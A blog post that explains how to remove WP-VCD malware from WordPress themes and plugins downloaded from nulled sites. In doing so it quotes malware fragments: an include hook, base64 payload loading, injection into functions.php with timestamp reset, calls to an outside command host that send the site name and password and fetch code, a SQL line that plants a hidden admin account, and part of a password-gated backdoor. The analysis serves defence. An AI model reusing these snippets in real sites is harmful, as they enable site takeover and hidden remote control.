Search for Content...
Blog

WP-VCD Malware Attack on Your WordPress Blog or Websites

Pardeep Patel

-

Affiliate Disclosure: Every purchase made through our affiliate links earns us a pro-rated commission without any additional cost to you. Here are more details about our affiliate disclosure.

It is discovered that some of the shared free – premium WordPress themes/ plugins from any nulled websites have a WP-VCD Malware Onclick Ads, and in this blog post we shared some quick tips and method how to clean/ avoid malware’s from your free download paid themes/ plugins from the freemium WordPress themes/ plugins nulled websites because of its spreading now.

How to clean your theme or plugin from WP-VCD Malware Attack

Step 1

Check the function.php on the Theme Directory.

If you found this kind of code:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

you should remove or delete it. Because the class.theme-modules.php contain the encrypted malware.

Step 2

Once you Activate the Theme without removing the Malware, it will infect your WordPress Core files. First malware creates a file wp-vcd.php in the wp-includes folder. wp-vcd.php file starts with a long base64 encoded string named $install_code

$install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[...] $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

This file injects the code of this encoded string inside the theme’s functions.php, taking care of resetting the modification date and time

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){ if (strpos($content, 'WP_V_CD') === false){ $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } }

then it populates remotely a database/array of hostnames and passwords of the code injections via code.php and downloads the content of a remote txt file inside class.wp.php

$content = @file_get_contents('http://www.derna.top/code.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.top/code.php'));

class.wp.php tries to inject a user inside the wp db

$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');");

and you should delete those files wp-vcd.php and class.wp.php, and remove the callback code from wp-includes/post.php on the first line

<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>

and check your functions.php from your theme because there is some malware’s codes on it and remove the

<?php<?phpif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '17a6d0135359512f9fc543b4e9d97596')) {$div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } [......]?>

until the end tag of malware.

Conclusion

Although “WP-VCD Malware” that’s not a particularly dangerous malware, extra care is needed to avoid to become victim of this kind of attacks even with an updated WordPress install.

Keep a firewall with core files changes monitoring and always update themes.

It is noticed that this malware is capable to propagate in a shared hosting where multiple wordpress installations are present on the same root directory (cross site contamination).

It has been reported that the infection comes sometimes from nulled wordpress themes & plugins.

Read Also: How to insert Google AdSense Ad code in your WordPress site

Related Articles

Like our Article/ Blog? Can buy a Buttermilk for our team.. Click here

Pardeep Patelhttps://pardeeppatel.com/
Hi!, I am Pardeep Patel, an Indian passport holder, Traveler, Blogger, Story Writer. I completed my M-Tech (Computer Science) in 2016. I love to travel, eat different foods from various cuisines, experience different cultures, make new friends and meet other.

Share this article

-- Advertisement --
Previous article
How to insert Google AdSense Ad code in your WordPress site
Next article
Earn Money by using G Suite Referral Program – Service of Google

LEAVE A REPLY

Please enter your comment!
Please enter your name here

-- Advertisement --

Find Products

Follow Us

Newsletter

© Study Warehouse. Developed by Pardeep Patel